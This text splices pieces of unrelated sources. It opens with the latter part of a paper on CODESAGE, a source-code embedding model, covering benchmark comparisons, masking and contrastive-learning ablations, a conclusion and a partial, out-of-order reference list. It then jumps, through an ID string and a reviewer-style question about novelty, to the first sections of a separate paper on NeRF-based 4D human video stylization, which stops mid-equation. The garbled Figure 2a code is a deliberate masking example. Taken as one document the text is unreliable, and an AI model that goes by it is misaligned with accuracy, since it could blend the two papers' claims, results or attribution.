As shown in Table 2, CODESAGE-SMALL achieves 18.54% to 51.1% relative (7.81% to 13.96% absolute) improvements over UnixCoder on NL2Code search. Compared to OpenAI-Ada-002, CODESAGE-SMALL attains a 12.86% relative (5.69% absolute) improvement on CoSQA and an 8.4% relative (3.12% absolute) improvement on AdvTest. On the other hand, OpenAI-Ada-002 attains the same average performance as CODESAGE-LARGE on CSN. However, we want to highlight the performance gain attained by CODESAGE on AdvTest, which contains normalized Python functions (from CSN) with function and variable names replaced by dummy variables (see Figure 9 in the Appendix). AdvTest constructed in this way better assesses generalization performance, as the model needs to understand what the obfuscated code does in order to identify the correct target code for a given natural language query.

Compared to both UnixCoder and OpenAI-Ada-002, CODESAGE persistently performs better on code complexity and runtime error prediction, with large margins, in Table 2. We also notice that CODESAGE underperforms both models on code defect detection, whilst attaining better performance when finetuning the full models (Table 12 in the Appendix).

4.2 Ablation Study

4.2.1 Masking Strategy

80-10-10 vs. Full Mask  Given an input sequence, standard MLM (Devlin et al., 2019b) first randomly samples a subset of its tokens, of which 80% are replaced by a special token "[MASK]", 10% are left unchanged, and the other 10% are replaced by random tokens from the vocabulary. We revisit the effectiveness of this convention, originally proposed for text, for source code in Figure 2.

def binary_search(arr, low, high, x):
    '''Returns index of x in arr if present, else -1.'''
    if high >= low:
        mid = (high + low) // 2
        if arr[mid] == x:
            return mid
        elif arr[mid] > x:
            return binary_search(arr, low, mid - 1, x)
        else:
            return binary_search(arr, mid + 1, high, x)
    else:
        return -1

def chem_search(arr, low<MASK> high, x):
    '''Returns <MASK> of x in arr if present, else ~<MASK>'''
    if high >= low:
        mid = (high + low) // 2
        if arr[mid] == x:
            return mid
        elif <MASK>[mid] > x:
            return 的所有~<MASK>(arr, low, mid - 1, <MASK>)
        else:
            return instead.search(arr, mid + 1, high)
    else:
        return -1

(a) Sample code (top) and its corrupted version following the 80-10-10 rule (bottom).

(b) With a fixed masking rate of 15%, we assess the effectiveness on downstream tasks of applying "Full Mask", i.e., replacing the sampled tokens with the [MASK] token only, versus the 80-10-10 corruption strategy.

Figure 2: 80-10-10 vs. "Full Mask".

| | CODESAGE-SMALL (R / D / S / P) | CODESAGE-BASE (R / D / S / P) | CODESAGE-LARGE (R / D / S / P) |
|-------------------|-------------------------------|-------------------------------|--------------------------------|
| NL2Code | 6.6 / 19.9 / 22.7 / 25.8 | 12.2 / 22.5 / 22.0 / 23.3 | 19.4 / 23.3 / 29.4 / 30.5 |
| Code2Code (In) | 16.8 / 14.6 / 17.9 / 19.7 | 28.2 / 23.7 / 25.3 / 29.2 | 30.7 / 28.2 / 30.2 / 33.9 |
| Code2Code (Cross) | 5.7 / 6.7 / 8.8 / 9.6 | 17.2 / 14.1 / 14.6 / 19.7 | 20.5 / 18.0 / 19.0 / 24.6 |
| Classification | 51.2 / 53.9 / 53.5 / 53.4 | 53.8 / 55.6 / 54.8 / 55.4 | 52.0 / 55.6 / 57.2 / 56.5 |

Table 3: We explore two options for leveraging DOBF (D) and random masking (R) to complement each other: (1) Sequential (S): training the model with random masking first, then with DOBF; (2) Parallel (P): randomly picking either DOBF or random masking for each training example (our strategy).
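For reference, the ablated 80-10-10 corruption illustrated in Figure 2a can be sketched as below; the vocabulary handling is simplified, and the random replacements are what may swap PL and NL tokens as discussed in Section 1.

```python
import random

def corrupt_80_10_10(tokens, positions, mask_id, vocab_size):
    """BERT-style corruption of the sampled positions: 80% become [MASK],
    10% become a random vocabulary token, 10% stay unchanged. For code,
    the random replacements can turn identifiers into unrelated tokens."""
    out = list(tokens)
    for p in positions:
        r = random.random()
        if r < 0.8:
            out[p] = mask_id
        elif r < 0.9:
            out[p] = random.randrange(vocab_size)
        # else: leave the token unchanged
    return out
```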
Surprisingly, compared to simply replacing all selected tokens with the [MASK] token, i.e., "Full Mask", the 80-10-10 masking scheme causes a large performance drop across different downstream tasks, as shown in Figure 2b. A similar finding has been reported in Gao et al. (2022) for text. However, the degradation is more severe for source code. As Figure 2a indicates, when tokens are replaced with random ones, both the semantics and the structure of the masked code can be largely disrupted, which, together with the presence of "[MASK]" tokens, makes the learning task too challenging (see Appendix A.3 for more discussion). We hypothesize that excessive corruption may also account for the modest improvement observed on downstream tasks when scaling up the size of a model trained with 80-10-10 in Figure 2b. It would be intriguing to explore whether this scaling trend experiences a sudden expansion with a further increase in model size and training data, potentially identifying a phase transition point, provided that the computational resources permit such an investigation.

Deobfuscation & Random Masking Complement Each Other  We investigate DOBF and random-masking-based MLM with "Full Mask" in Table 3. DOBF persistently outperforms random masking on classification, which validates our motivation that the model is pushed to better capture (understand) the code structure in order to predict identifier names. DOBF also performs better than random masking on NL2Code search. A potential reason is that natural language in comments and docstrings often carries rich code semantics, while both are excluded from masking in DOBF; hence, when the model is trained to predict identifier names, it looks at and correlates with the natural language, leading to better contextualized representations between natural language and programming language. On the other hand, the random masking strategy (with "Full Mask") outperforms DOBF on both the in-language and cross-language Code2Code search tasks. As examined in Appendix A.3, a large portion of the tokens in code snippets are not identifiers. The random masking strategy therefore allows the model to learn beyond identifiers and enriches the semantics encoded in the representations. In summary, Table 3 validates our strategy of jointly optimizing DOBF and random masking to leverage their complementary strengths.

(a) Effectiveness of hard negatives and hard positives. (b) Unimodal vs. bimodal contrastive learning.

Figure 3: (a) Hard negatives and hard positives can independently boost performance over the baseline where neither is applied; further improvement is attained when leveraging them simultaneously. (b) Unimodal contrastive learning with positives obtained via dropout requires longer training and hence cannot leverage vast amounts of training data to further enhance the representations.

4.2.2 ON THE EFFECTIVENESS OF CONTRASTIVE LEARNING

Hard Positives and Hard Negatives Effectively Boost Performance  We first demonstrate the effectiveness of the hard positive and hard negative construction strategy in Figure 3a. As shown, both hard positives and hard negatives can independently improve performance by a large margin, while their combination persistently yields better performance across different model sizes. We also observe that the larger model (i.e., CODESAGE-BASE) benefits more from the proposed hard negative construction strategy.
This observation is unsurprising, since larger models possess more capacity to leverage more challenging and effective learning objectives.

Unimodal vs. Bimodal Contrastive Learning  In Figure 3b we compare our bimodal contrastive learning approach against dropout-based unimodal contrastive learning, where a positive pair is obtained from different dropout masks of the transformer in two forward passes of the same sequence (Gao et al., 2021; Guo et al., 2022). For a fair comparison, hard negative optimization is applied to both approaches. We can see that dropout-based unimodal contrastive learning struggles to support a long training process and hence cannot effectively utilize a large amount of pretraining data to further improve the representations. A similar finding has been reported by Zhou et al. (2022). Indeed, both Gao et al. (2021) and Guo et al. (2022), which demonstrate dropout as an effective augmentation for text and code respectively, use only a few million training examples, an amount covered by the first 500 iterations (with batch size 8K) in Figure 3b, where dropout-based contrastive learning does show improvement over the baseline.

Larger Improvement on Cross-Lingual Search  To gain a deeper understanding of the performance improvement achieved through contrastive learning during Stage II of pretraining, we analyze the semantic search performance in detail. As Figure 4a shows, contrastive learning persistently boosts search performance, with comparatively larger improvements in the cross-lingual scenarios, encompassing both NL2Code and cross-language Code2Code search. We posit that the text extracted from docstrings helps group semantically equivalent code together, as the text often summarizes the high-level semantics of the code and is hence likely less diverse than the code itself. In particular, parallel examples from different programming languages can share very similar or even identical summaries. For NL2Code, the larger improvement can be credited to its alignment with the bimodal contrastive learning objective using (text, code) pairs as positives. This bimodal objective also brings NL and PL closer, as shown in Figure 4b: compared to the model trained with Stage-I only, contrastive learning pulls NL and PL together such that the relative similarity gap between parallel NL2Code pairs and cross-language Code2Code parallel examples is largely decreased.

(a) The semantic search performance of CODESAGE, comparing in-language and cross-language search across model sizes and training approaches. (b) Cosine similarity between parallel examples vs. randomly sampled pairs using CODESAGE representations.

Figure 4: Examining the effectiveness of contrastive learning (Stage-II) by comparing CODESAGE against models trained with the token-level denoising objective only (Stage-I). (a) Compared to in-language Code2Code search, contrastive learning persistently leads to a larger performance boost for cross-lingual search, including both NL2Code and cross-language Code2Code search. (b) Contrastive learning leads to a more dispersed representation space with improved discrimination, as indicated by the enlarged similarity gap between parallel and randomly sampled pairs, while simultaneously bridging the relative similarity gap between NL2Code and Code2Code pairs.
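The Figure 4b statistic can be reproduced with a few lines; a sketch follows, assuming row-aligned embeddings for the parallel pairs.

```python
import torch
import torch.nn.functional as F

def similarity_gap(emb_a, emb_b):
    """Gap between parallel-pair similarity and random-pair similarity.

    emb_a, emb_b: (N, d) embeddings where (emb_a[i], emb_b[i]) are parallel
    examples (e.g., text/code or cross-language code pairs).
    """
    a, b = F.normalize(emb_a, dim=-1), F.normalize(emb_b, dim=-1)
    sim = a @ b.T
    parallel = sim.diagonal().mean()                       # aligned pairs
    n = sim.size(0)
    random_pairs = (sim.sum() - sim.diagonal().sum()) / (n * (n - 1))
    return (parallel - random_pairs).item()
```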
4.3 On Objective and Downstream Performance Scaling with Model Size

In Figure 5, we study how downstream task performance scales with model size when pretrained with different schemes: the token-level objective only (Stage-I), contrastive learning only (Stage-II), and our proposed two-stage framework with Stage-I followed by Stage-II. We use the zero-shot multilingual in-language code search performance (averaged over nine languages) for this exploration. We can see that models pretrained from scratch with contrastive learning alone do not scale with increased model size. Neelakantan et al. (2022) report a similar finding, namely that the contrastive objective on its own is not sufficient to learn useful representations. When training from scratch with contrastive learning only, we find that the training loss often converges at a large value, indicating that the model cannot discriminate each positive pair from the other in-batch negatives well. In other words, leveraging the token-level denoising objective to provide a good embedding foundation is essential for contrastive learning to be effective and to further enhance the sequence-level representations.

5 Conclusion

In this study, we unveiled CODESAGE, a cutting-edge encoder representation learning model for source code. We trained CODESAGE using an extensive dataset comprising 237 million code files and 75 million bimodal code and natural language pairs across nine languages. Our findings reveal that our model significantly outperforms its predecessors in tasks related to code search and code classification. We also delve into the essential factors contributing to enhanced code representation learning across various model sizes. We hope our work will serve as an inspiration for future work, not only in code representation learning that effectively utilizes publicly accessible extensive corpora of source code, but also in the broader field of universal model training. This includes integrating language generation and embedding within a single model, as seen in the works of Jain et al. (2023) and Muennighoff et al. (2024). Additionally, we aim to encourage advancements in cross-domain representation learning, such as unifying text and code embedding within a single model.

REFERENCES

Marie-Anne Lachaux, Baptiste Roziere, Marc Szafraniec, and Guillaume Lample. DOBF: A de-obfuscation pre-training objective for programming languages. In A. Beygelzimer, Y. Dauphin, P. Liang, and J. Wortman Vaughan (eds.), *Advances in Neural Information Processing Systems*, 2021. URL https://openreview.net/forum?id=3ez9BSHTNT.

David Bieber, Rishab Goel, Dan Zheng, Hugo Larochelle, and Daniel Tarlow. Static prediction of runtime errors by learning to execute programs with external resource descriptions. In *The Eleventh International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=lLp-CSnTdJG.

Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, et al. Evaluating large language models trained on code. *ArXiv preprint*, abs/2107.03374, 2021. URL https://arxiv.org/abs/2107.03374.

Ting Chen, Simon Kornblith, Mohammad Norouzi, and Geoffrey E. Hinton. A simple framework for contrastive learning of visual representations. In *Proceedings of the 37th International Conference on Machine Learning, ICML 2020, 13-18 July 2020, Virtual Event*, volume 119 of *Proceedings of Machine Learning Research*, pp. 1597–1607, 2020.
URL http://proceedings.mlr.press/v119/chen20j.html. Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, et al. Palm: Scaling language modeling with pathways. *arXiv preprint arXiv:2204.02311*, 2022. URL https://arxiv.org/abs/2204.02311. Kevin Clark, Minh-Thang Luong, Quoc V. Le, and Christopher D. Manning. Electra: Pre-training text encoders as discriminators rather than generators. In *International Conference on Learning Representations*, 2020. URL https://openreview.net/forum?id=rIxmMH1BtvB. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. In *Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers)*, pp. 4171–4186, Minneapolis, Minnesota, June 2019a. Association for Computational Linguistics. doi: 10.18653/v1/N19-1423. URL https://aclanthology.org/N19-1423. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. In *Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers)*, pp. 4171–4186, 2019b. doi: 10.18653/v1/N19-1423. URL https://aclanthology.org/N19-1423. Zhangyin Feng, Daya Guo, Duyu Tang, Nan Duan, Xiaocheng Feng, Ming Gong, Linjun Shou, Bing Qin, Ting Liu, Daxin Jiang, and Ming Zhou. CodeBERT: A pre-trained model for programming and natural languages. In *Findings of the Association for Computational Linguistics: EMNLP 2020*, pp. 1536–1547, 2020a. doi: 10.18653/v1/2020.findings-emnlp.139. URL https://aclanthology.org/2020.findings-emnlp.139. Zhangyin Feng, Daya Guo, Duyu Tang, Nan Duan, Xiaocheng Feng, Ming Gong, Linjun Shou, Bing Qin, Ting Liu, Daxin Jiang, and Ming Zhou. CodeBERT: A pre-trained model for programming and natural languages. In *Findings of the Association for Computational Linguistics: EMNLP 2020*, pp. 1536–1547, Online, November 2020b. Association for Computational Linguistics. doi: 10.18653/v1/2020.findings-emnlp.139. URL https://aclanthology.org/2020.findings-emnlp.139. Jun Gao, Changlong Yu, Wei Wang, Huan Zhao, and Ruifeng Xu. Mask-then-fill: A flexible and effective data augmentation framework for event extraction. In *Findings of the Association for Computational Linguistics: EMNLP 2022*, pp. 4537–4544, Abu Dhabi, United Arab Emirates, December 2022. Association for Computational Linguistics. doi: 10.18653/v1/2022.findings-emnlp.332. URL https://aclanthology.org/2022.findings-emnlp.332.
LH2JNpfwdH
Also, in the METHODOLOGY section, the authors repeatedly mention that many components of the framework are motivated by previous methods. How can the authors persuade reviewers that the proposed framework is innovative rather than an incremental combination of previous works?
Towards 4D Human Video Stylization

Anonymous authors
Paper under double-blind review

Abstract

We present a first step towards 4D (3D and time) human video stylization, which addresses style transfer, novel view synthesis and human animation within a unified framework. While numerous video stylization methods have been developed, they are often restricted to rendering images in specific viewpoints of the input video, lacking the capability to generalize to novel views and novel poses in dynamic scenes. To overcome these limitations, we leverage Neural Radiance Fields (NeRFs) to represent videos, conducting stylization in the rendered feature space. Our innovative approach involves the simultaneous representation of both the human subject and the surrounding scene using two NeRFs. This dual representation facilitates the animation of human subjects across various poses and novel viewpoints. Specifically, we introduce a novel geometry-guided tri-plane representation, significantly enhancing feature representation robustness compared to direct tri-plane optimization. Following the video reconstruction, stylization is performed within the NeRFs' rendered feature space. Extensive experiments demonstrate that the proposed method strikes a superior balance between stylized textures and temporal coherence, surpassing existing approaches. Furthermore, our framework uniquely extends its capabilities to accommodate novel poses and viewpoints, making it a versatile tool for creative human video stylization. The source code and trained models will be made available to the public.

1 Introduction

Existing video style transfer methods have seen substantial progress in recent years (Li et al., 2019; Wang et al., 2020; Liu et al., 2021; Chen et al., 2021a; Chiang et al., 2022; Wu et al., 2022). These methods are designed to produce stylized frames given the content frames and a style image. To mitigate the issue of flickering artifacts between frames, they typically resort to optical flow or temporal constraints in an attempt to create smoother content. However, even as these methods excel at crafting high-quality stylized frames, being built upon 2D networks, they are fundamentally bound to the same perspective as the source content videos. Consequently, video stylization in novel views remains unexplored. Furthermore, these techniques lack the capability to alter or animate human poses within the stylized video, which severely limits their creative potential.

On the other hand, while NeRFs (Mildenhall et al., 2020) have been utilized in prior works to render stylized novel views in a static scene (Huang et al., 2022; Chiang et al., 2022; Liu et al., 2023) given dense views as the input, directly applying them to dynamic human scenes presents three primary issues. First, it is challenging to model dynamic humans in a scene across different frames, especially since NeRF is inherently designed for static scenes. Consequently, the learned model is incapable of performing human animation. Second, it is challenging to efficiently encode and optimize 3D points due to the significant computational cost associated with the model structure, such as multilayer perceptrons (MLPs). Third, supporting arbitrary style images with one model (zero-shot stylization) presents an additional layer of complexity. In this paper, we propose a holistic approach to perform video stylization on the original view, novel views, and animated humans with arbitrary styles through a unified framework.
Given a monocular video and an arbitrary style image, we first reconstruct both the human subject and the environment simultaneously and then stylize the generated novel views and animated humans, facilitating creative effects and eliminating the dependency on costly multi-camera setups. More specifically, we incorporate a human body model, e.g., SMPL (Loper et al., 2015), to transform the human from the video space to the canonical space, optimize the static human in the canonical space using NeRFs, and make pose-driven animation of the human feasible. In addition, we improve the feature learning of the tri-plane-based representation (Fridovich-Keil et al., 2023), which represents the 3D space with three axis-aligned orthogonal planes and is fast in both training and inference. We discretize both the human and scene spaces into 3D volumes and introduce a geometry prior by encoding the coordinates on the grids. This assists in learning a more robust feature representation across the entire 3D space. To render each pixel value, we project two camera rays into both NeRFs and extract the feature of each point on a ray by projecting it onto the three planes. Volume rendering is then utilized to generate a feature vector for each pixel, followed by the injection of the VGG feature of the style image and the employment of a lightweight decoder to yield stylized RGB values. In summary, based on the NeRF models, our method can model both dynamic humans and static scenes in a unified framework, allowing high-quality stylized rendering of novel poses and novel views.

A naïve way to accomplish this new creative task might first utilize existing NeRF-based methods to generate the animated humans and novel views of a scene, followed by the application of existing video stylization techniques on these generated images. Our proposed method presents two notable advantages over this baseline. First, by circumventing the use of predicted RGB images, our method applies stylization directly in the feature space, which tends to yield more consistent results compared to employing the generated images as input for video stylization. Second, our method enhances efficiency by eliminating the necessity for an image encoder and instead employing a lightweight decoder. This optimized architecture not only accelerates processing but also maintains, if not enhances, the stylization quality across the diverse visual elements within the video.

The main contributions are outlined as follows:

• We propose a video stylization framework for dynamic scenes, which can stylize novel views and animated humans in novel poses, given a monocular video and arbitrary style images. While traditional video stylization methods are built upon 2D networks, ours is developed from a 3D perspective.

• We introduce a tri-plane-based representation and incorporate a geometric prior to model the 3D scenes. The representation is efficient and has better feature learning capability.

• Compared to existing methods, the proposed method showcases a superior balance between stylized textures and temporal coherence, and holds the unique advantage of being adaptable to novel poses and various backgrounds.

2 RELATED WORK

Video stylization. Video stylization extends image stylization (Gatys et al., 2016; Huang & Belongie, 2017) by enforcing temporal consistency of stylization across frames.
This is achieved by exploring image-space constraints such as optical flow (Chen et al., 2017; Huang et al., 2017; Wang et al., 2020) and cross-frame feature correlation (Deng et al., 2021; Liu et al., 2021), as well as through careful design of feature transformations (Li et al., 2019; Liu et al., 2021). Nevertheless, stylization is confined to existing frames (or views) due to the lack of a holistic scene representation. By contrast, our method presents the first 4D video stylization approach based on neural radiance fields. It is tailored for human-centric videos, achieves superior temporal consistency without image-space constraints, and uniquely supports stylized rendering of animated humans in novel views (Table 1a).

Stylizing neural radiance fields. Neural radiance fields (NeRFs) are volumetric scene representations introduced for novel view synthesis (Mildenhall et al., 2020). NeRF has lately been adapted for stylized novel view synthesis (Chiang et al., 2022; Zhang et al., 2022; Xu et al., 2023; Liu et al., 2023) as it provides strong geometric constraints to enforce multi-view consistency of stylization. Early methods bake the style into the weights of a NeRF and thus require learning one model for each style (Zhang et al., 2022; Xu et al., 2023). Most relevant to our work, StyleRF (Liu et al., 2023) enables zero-shot NeRF stylization via deferred style transformation, where 2D feature maps volume-rendered from a NeRF are modulated by an arbitrary style and subsequently decoded into a stylized image. Similar to StyleRF, our method leverages NeRF as the underlying scene representation and supports zero-shot stylization. Different from StyleRF, our method takes as input a monocular video of a moving human as opposed to multi-view images of a static scene (Table 1b).

Figure 1: **Overview.** Given a camera ray, we sample foreground (human) and background (scene) points separately through the human and scene NeRFs. The points from the human are warped into canonical space via inverse warping. Then, each point is projected onto three 2D planes to extract a feature representation via bilinear interpolation, and the planar features are combined via the Hadamard product. The features are utilized to predict the RGB appearance and density. We composite the foreground and background points for the dynamic foreground and multi-view background along each camera ray and apply volume rendering to attain the pixel feature on the 2D feature map. Subsequently, stylization is applied to the feature map by AdaAttN (Liu et al., 2021), and a decoder processes the stylized features, which are then decoded into the stylized image. Our model can stylize novel views and animated humans in the same scene by taking novel camera parameters and articulations as extra inputs.

### 3 METHODOLOGY

Given a monocular video of a dynamic human and an arbitrary style image, our goal is to synthesize *stylized novel views* of a person with any *different poses* (i.e., animated humans) in a scene. To achieve this, we propose a unified framework (Figure 1) consisting of three modules: 1) two novel tri-plane based feature representation networks to encode geometric and appearance information of dynamic humans and their surroundings; 2) a style transfer module to modulate the rendered feature maps from NeRFs as conditioned on the input style image; 3) a lightweight decoder to synthesize the stylized images from novel viewpoints or new poses. We will present each module in detail.
#### 3.1 GEOMETRY GUIDED TRI-PLANE BASED FEATURE REPRESENTATION

Motivated by (Fridovich-Keil et al., 2023), we incorporate a tri-plane representation to model the 3D scene in canonical space, thereby reducing memory usage and accelerating the training and rendering processes compared to the MLPs utilized in NeRF. The tri-plane representation describes a scene with three orthogonal planes \((P_{xy}, P_{xz}, P_{yz})\). For any 3D point, we project its 3D coordinate onto the three orthogonal planes to get the corresponding locations in each plane. Then, the features of the 3D point are computed as the product of bilinearly interpolated features on the three planes. A small MLP is used to decode the features into density and appearance.

However, tri-plane features without spatial constraints are limited in expressiveness when directly optimized. This can be verified in Figure 2, where NeRF with a directly optimized tri-plane produces blurry results on the wall and its boundary.

Figure 2: Visual results of direct optimization using the tri-plane features and the geometry guided tri-plane features. Our method can recover clearer background texture (1st row) and sharper contours (2nd row).

To overcome this limitation, we propose to encode the 3D coordinates anchored to the tri-plane as the geometric prior over the whole space. Here we discretize the 3D space as a volume and divide it into small voxels with sizes of 10 mm × 10 mm × 10 mm. Voxel coordinates transformed by the positional encoding \( \gamma_v(\cdot) \) are mapped onto three planes to serve as the input to the tri-plane. Encoded coordinates projected onto the same pixel are aggregated via average pooling, resulting in planar features of size \( H_{P_i} \times W_{P_i} \times D \), where \( P_i \) represents the \( i \)-th plane and \( D \) is the dimension of the feature on each plane. Motivated by the U-Net architecture (Ronneberger et al., 2015), we use three encoders with 2D convolutional networks to represent the tri-plane features.

To obtain the feature \( f_p(x) \) of a 3D point \( x = (x, y, z) \), we project the point onto the three planes \( \pi_p(x), p \in (P_{xy}, P_{xz}, P_{yz}) \), where \( \pi_p \) denotes the projection operation that maps \( x \) onto the \( p \)-th plane. Then, bilinear interpolation is executed on a regularly spaced 2D grid to obtain the feature vector \( \phi(\pi_p(x)) \). The operation is repeated for each plane to obtain three feature vectors \( f_p(x) \). To incorporate these features over the three planes, we use the Hadamard product (element-wise multiplication) to produce an integrated feature vector, \( f(x) = \prod_{p \in (P_{xy}, P_{xz}, P_{yz})} f_p(x) \). Finally, \( f(x) \) is decoded into color and density using two separate MLPs. Either the Hadamard product or addition can be utilized to generate the feature vector \( f(x) \). We choose the Hadamard product here as it can generate spatially localized signals, which is a distinct advantage over addition, as described in (Fridovich-Keil et al., 2023). Figure 2 shows that the proposed geometry guided method generates clearer background pixels than the one with direct optimization. Quantitative results on stylization can be found in Section 4.3.

3.2 Neural Radiance Fields

We propose to leverage the NeRF to model 3D scenes and extend the original NeRF (Mildenhall et al., 2020) to achieve the purpose of stylization. In the original NeRF, the color and density are directly output for any queried 3D point.
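Before detailing this feature-based extension, the following is a minimal PyTorch sketch of the tri-plane feature query of Section 3.1 (our own illustration under assumed shapes; the plane resolution, feature dimension, and function names are placeholders, not the authors' implementation):

```python
import torch
import torch.nn.functional as F

def query_triplane(points, planes):
    """points: (N, 3) coordinates in [-1, 1]^3; planes: three (1, D, H, W) feature maps."""
    # Project each 3D point onto the three axis-aligned orthogonal planes.
    projections = {"xy": points[:, [0, 1]], "xz": points[:, [0, 2]], "yz": points[:, [1, 2]]}
    feature = None
    for name, uv in projections.items():
        grid = uv.view(1, -1, 1, 2)                      # sampling grid for grid_sample
        f_p = F.grid_sample(planes[name], grid, mode="bilinear", align_corners=True)
        f_p = f_p.view(planes[name].shape[1], -1).t()    # (N, D) per-plane features
        feature = f_p if feature is None else feature * f_p  # Hadamard product over planes
    return feature                                       # f(x), decoded by small MLPs

D, H, W = 32, 128, 128
planes = {k: torch.randn(1, D, H, W) for k in ("xy", "xz", "yz")}
feat = query_triplane(torch.rand(1024, 3) * 2 - 1, planes)  # (1024, 32)
```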
In contrast, for each point on the camera ray we predict a \( C \)-dimensional feature vector \( \hat{f}(x) \in \mathbb{R}^C \), motivated by (Niemeyer & Geiger, 2021; Liu et al., 2023). Specifically, for every queried point \( x \in \mathbb{R}^3 \), our model outputs its volume density \( \sigma \) and feature vector \( \hat{f}(x) \) by \( F_\Theta : (f(x), \gamma_d(d)) \rightarrow (\sigma, \hat{f}(x)) \), where \( \gamma_d(d) \) represents the positional encoding of the view direction \( d \) and \( f(x) \) is the feature vector extracted from the tri-plane. Then, the feature vector of any image pixel is derived by accumulating the \( N \) sampled points along the ray \( r \) through integration (Mildenhall et al., 2020),

\[ f(r) = \sum_{i=1}^{N} w_i \hat{f}(x_i), \quad w_i = T_i \left(1 - \exp(-\sigma_i \delta_i)\right), \tag{1} \]

where \( \sigma_i \) and \( \delta_i \) denote the volume density and the distance between adjacent samples, \( w_i \) is the weight of the feature vector \( \hat{f}(x_i) \) on the ray \( r \), and \( T_i = \exp\left(-\sum_{j=1}^{i-1} \sigma_j \delta_j\right) \) is the accumulated transmittance along the ray.

We treat the background across frames as multi-view images and train the scene NeRF for the background model with the human masked out in each frame. To capture dynamic humans with various poses, we train the human NeRF in the canonical space, leveraging priors with a deformation field that transforms the human from the observation to the canonical space. Here, the observation space describes the images from the input video, and the canonical space is the global one shared by all frames.

Scene NeRF. We extract features from the background tri-plane to predict the density and feature vector \( \hat{f}_s(x) \) for each point with two tiny MLP networks. In detail, the density branch has one fully connected layer, while the feature branch utilizes a hidden layer comprising 128 units, followed by one output layer. Subsequently, the feature vectors on the same camera ray are aggregated to generate a feature vector \( \hat{f}_s(r) \) for each pixel using Equation 1.

Human NeRF. The human NeRF is represented in a 3D canonical space. To synthesize a pixel on the human body for each video frame as in the observation space, the sampled points along the corresponding ray are transformed from the observation space into the canonical space by the rigid transformation associated with the closest point on the mesh. Here, we use a parametric SMPL (Loper et al., 2015) model to provide explicit guidance on the deformation of spatial points. This approach is beneficial for learning a meaningful canonical space while simultaneously reducing the dependency on diverse poses when generalizing to unseen poses. This allows us to train the NeRF in dynamic scenarios featuring a moving person and animate the person during inference. Motivated by (Chen et al., 2021b), the template pose in canonical space is defined as the X-pose \( \theta_c \) because of its good visibility and separability of each body component in the canonical space. The pose \( \theta_o \) in the observation space can be converted to the X-pose \( \theta_c \) in the canonical space by using the inversion of the linear blend skinning derived from the SMPL model. We extend these transformation functions to the space surrounding the mesh surface to allow the 3D points near the mesh to move consistently with adjacent vertices. Specifically, the inverse linear blend skinning is defined based on the 3D human skeleton.
The human skeleton represents \( K \) parts that generate \( K \) transformation matrices \( \{G_k\} \in SE(3) \): \( \tilde{x} = \left( \sum_{k=1}^{K} w_o^k(x)\, G_k \right)^{-1} x \), where \( w_o^k(x) \) is the blend weight of the \( k \)-th part, and \( x \) and \( \tilde{x} \) denote the 3D points in the observation and canonical spaces, respectively. This inverse function cannot fully express the deformation details caused by the rather complicated movement of clothes and misaligned SMPL poses. Thus, motivated by (Jiang et al., 2022), we adopt an error-correction network \( E \) to correct the errors in the warping field, which learns a mapping for a point from the observation space to the canonical space. Here, \( E \) comprises an MLP with the 3D point coordinates as the input and predicts the error. Therefore, the canonical point is defined as \( \tilde{x}_c = \tilde{x} + E(x) \). For each point \( \tilde{x}_c \), we extract features from the tri-plane of the human and utilize another lightweight decoder to predict the density and appearance \( \hat{f}_h(x) \).

Composite NeRFs. To obtain the RGB value for each image pixel, two rays, one for the human NeRF and the other for the scene NeRF, are utilized. Colors and densities for the points on the two rays are obtained and sorted in ascending order based on the depth values. We then utilize Equation 1 to render a feature vector \( f(r) \) based on the points on the two rays.

3.3 Stylizing the Scene

The stylization module takes the above-mentioned NeRF-rendered features (content features) and the style image as input and generates the stylized image based on the Adaptive Attention Normalization (AdaAttN) layer (Liu et al., 2021). The feature map of the style image is extracted from the pre-trained VGG network (Simonyan & Zisserman, 2014). Let \( F_s \) be the style features and \( F_c \) be the set of content features tailored to a 2D patch, where each pixel vector is rendered by the Composite NeRFs introduced in Section 3.2. The style transfer module is formulated by \( F_{cs} = \psi(\text{AdaAttN}(\phi(F_c), F_s)) \), where \( \phi \) and \( \psi \), formulated as MLPs, are learned mappings for the content and stylized features, and AdaAttN (Liu et al., 2021) is designed to adaptively transfer the feature distribution from the style image to the content by the attention mechanism. Specifically, \( F_{cs} \) is generated by calculating the attention map within the features of the content and style images. The stylized feature \( F_{cs} \) is then applied to generate the stylized image via a decoder.

3.4 Image Decoding

Finally, an image decoder \( F_\theta \) is designed to map the stylized 2D feature \( F_{cs} \in \mathbb{R}^{H \times W \times M} \), which captures high-level information, to the final stylized image \( I \in \mathbb{R}^{H \times W \times 3} \) at the input resolution,

\[ F_\theta : \mathbb{R}^{H \times W \times M} \rightarrow \mathbb{R}^{H \times W \times 3}. \]

The operation \( F_\theta \), comprising convolutional and ReLU activation layers and aiming to render a full-resolution RGB image, is parameterized as a 2D decoder. In the convolutional layers, we opt for \( 3 \times 3 \) kernel sizes without intermediate layers to allow only spatially minor refinements and avoid entangling global scene properties during image synthesis.

3.5 Objective Functions

We aim to stylize novel views of animated humans based on the reconstructed scene and humans.
In the reconstruction stage, we first train the NeRFs by minimizing the rendered RGB image reconstruction loss. Afterward, in the stylization stage, we remove the last fully connected layer of the above-trained NeRF networks and attach the stylization module and the decoder to synthesize stylized images. Next, we introduce the losses adopted for training both the scene and human NeRFs and the objective functions for stylization.

Scene NeRF. The objective function for training the scene NeRF is defined as

$$L_s = \sum_{r \in R} \|C_s(r) - \tilde{C}_s(r)\|, \tag{3}$$

where $R$ is the set of rays, and $C_s$ and $\tilde{C}_s$ denote the predicted and the ground truth RGB values, respectively.

Human NeRF. The region covered by the human mask $M(\cdot)$ is optimized by

$$L_r(r) = M(r)\|C_h(r) - \tilde{C}_h(r)\|, \tag{4}$$

